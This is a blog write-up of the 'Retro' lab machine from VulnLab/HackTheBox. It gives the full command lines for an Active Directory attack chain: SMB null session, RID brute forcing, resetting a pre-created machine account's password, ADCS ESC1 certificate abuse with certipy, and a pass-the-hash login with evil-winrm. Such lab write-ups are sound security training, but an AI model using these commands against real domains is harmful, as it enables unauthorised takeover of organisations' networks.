Retro - Writeup (VulnLab & HackTheBox)


██████╗░███████╗████████╗██████╗░░█████╗░
██╔══██╗██╔════╝╚══██╔══╝██╔══██╗██╔══██╗
██████╔╝█████╗░░░░░██║░░░██████╔╝██║░░██║
██╔══██╗██╔══╝░░░░░██║░░░██╔══██╗██║░░██║
██║░░██║███████╗░░░██║░░░██║░░██║╚█████╔╝
╚═╝░░╚═╝╚══════╝░░░╚═╝░░░╚═╝░░╚═╝░╚════╝░
-----------------------------------------
Easy box with SMB null session for initial foothold,
RID bruteforce to get hints of a machine account,
password reset, and ESC1 abuse through ADCS to escalate to Domain Admin.
❄️ NMAP & INFO
53 → domain (Simple DNS Plus)
88 → kerberos-sec (Microsoft Windows Kerberos)
135 → msrpc (Microsoft Windows RPC)
139 → netbios-ssn (Microsoft Windows netbios-ssn)
389 → ldap (Microsoft Windows Active Directory LDAP)
445 → microsoft-ds?
464 → kpasswd5?
593 → ncacn_http (Microsoft Windows RPC over HTTP 1.0)
636 → ssl/ldap (Microsoft Windows Active Directory LDAP)
3268 → ldap (Microsoft Windows Active Directory LDAP)
3269 → ssl/ldap (Microsoft Windows Active Directory LDAP)
3389 → ms-wbt-server (Microsoft Terminal Services)
❄️ FOOTHOLD
Since we don’t have any credentials yet, I started by bruteforcing Kerberos usernames using kerbrute, which revealed two valid accounts:
guest@retro.vl
administrator@retro.vl
An attempt at an RPC null session didn’t give me anything useful. So instead, I tried an SMB null session, this time assuming the guest
account might allow anonymous access.
That folder Trainees looks interesting, we got Read permissions:
SMB | Null Session
Using smbclient.py:
smbclient.py DC.retro.vl/guest:''@10.129.172.145
After reading that note in the smb share, I tried to enumerate system accounts using RID bruteforcing with netexec:
nxc smb 10.129.172.145 -u guest -p '' --rid-brute
I built a list of possible usernames and ran a brute-force attack, which gave me valid credentials/access..
SMB | Trainee | flag.txt
If I enumerate again using the newly obtained credentials, we get access to a new shared resource called Notes, where we have read permissions. If we connect via SMB, we’ll find two files:
user.txt
(our flag.txt)ToDo.txt
Bloodhound Time
After reading the ToDo.txt file, I run an enumeration with bloodhound-python to visualize all possible objects in the AD:
bloodhound-python -u 'trainee' -p '<REDACTED>' -ns 10.129.172.145 -d 'retro.vl' -c all --dns-tcp --zip
Based on the hint mentioning an old pre-created machine account, I found a computer object named BANKING.RETRO.VL
.
Knowing that machine accounts often use a default format like Banking$
, I started testing a few common passwords with brute-force:
After reading that post, the STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
error means the machine account password was reset or set to a default (like its lowercase name) after being pre-created or reset in AD, so it’s out of sync and no longer trusted by the domain!
By running:
changepasswd.py retro.vl/'BANKING$':banking@10.129.172.145 -newpass '<REDACTED>' -dc-ip 10.129.172.145 -p rpc-samr
I was able to change the machine account password successfully. Impacket’s changepasswd.py
script lets you change a user’s password using LDAP, kpasswd, SMB, or RPC. Both SMB and RPC use the SAMR protocol, but since we can’t access the IPC$
share with the default password (as already seen), we go with rpc-samr
, which doesn’t require SMB session setup.
ADCS | PrivEsc
After reviewing BloodHound again and changing the password for BANKING$
, I enumerate with netexec to check for ADCS and see if we can abuse any templates.
The result confirms there’s a PKI Enrollment Server at DC.retro.vl
, and the Certificate Authority is retro-DC-CA
.
ADCS | Finding Vulnerable Certificates
By running:
certipy find -vulnerable -u BANKING$@DC.retro.vl -p "<REDACTED>" -target 10.129.172.145 -dc-ip 10.129.172.145 -stdout
ESC1 Abuse
Now we can abuse ESC1 using certipy like this:
certipy req -u 'BANKING$'@retro.vl -p '<REDACTED>' -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -dc-ip 10.129.172.145 -target-ip 10.129.172.145 -key-size 4096
Then I extract the hash like this and log in as administrator
via evil-winrm:
evil-winrm -i 10.129.172.145 -u Administrator -H '<HASH>'
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
Pwned!
Subscribe to my newsletter
Read articles from shkz directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by

shkz
shkz
I am shkz, a Security Researcher, Red Team and CTF Player.